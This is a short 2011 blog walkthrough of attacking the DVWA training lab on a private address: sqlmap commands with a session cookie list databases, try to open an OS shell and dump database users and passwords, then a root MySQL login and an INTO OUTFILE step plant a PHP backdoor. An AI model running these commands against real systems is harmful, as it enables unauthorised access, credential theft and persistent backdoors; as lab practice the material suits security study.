Monday, July 25, 2011

Gaining Backdoor Through Sql



1. We go to see DVWA sql injection blind, and the link is:
http://192.168.56.101/dvwa/vulnerabilities/sqli_blind/


2. Try to get variable from the page, that mean the variable will be used for sqlmap. And the variable in sqlmap are:

root@elha:/pentest/database/sqlmap# python sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli_blind/?id=&Submit=Submit#" --dbs


But not successfully. Than using cookie and try it again.

root@elha:/pentest/database/sqlmap# python sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=08c438fb02ed2086b4bad5717a87b0f8" --dbs


Now we get the list of databases:


3. We try to create shell with --os-shell

root@elha:/pentest/database/sqlmap# python sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=08c438fb02ed2086b4bad5717a87b0f8" --os-shell


But, seems like not successfully again.. So we try another way with access sql now.

4. Than, we edit the sqlmap to get user and password from sql

root@elha:/pentest/database/sqlmap# python sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli_blind/?id=&Submit=Submit#" --cookie="security=low; PHPSESSID=08c438fb02ed2086b4bad5717a87b0f8" --users --passwords


Finally we get the user and password. The user and password for sql are: root and NULL.

5. Now, we connect trough mysql

root@elha:/ubuntu# mysql -h 192.168.56.101 -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 2
Server version: 5.1.33 Source distribution

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>



And then the list of databases:


6. Because early phase we use with dvwa, than we use dvwa's database to create another table or create another record in one of tables.


Now, we have that record:


7. Than we executed that record to create php execution with into outfile


8. Finally, we can test the backdoor and upload another else.





~~~


0 comments:

Post a Comment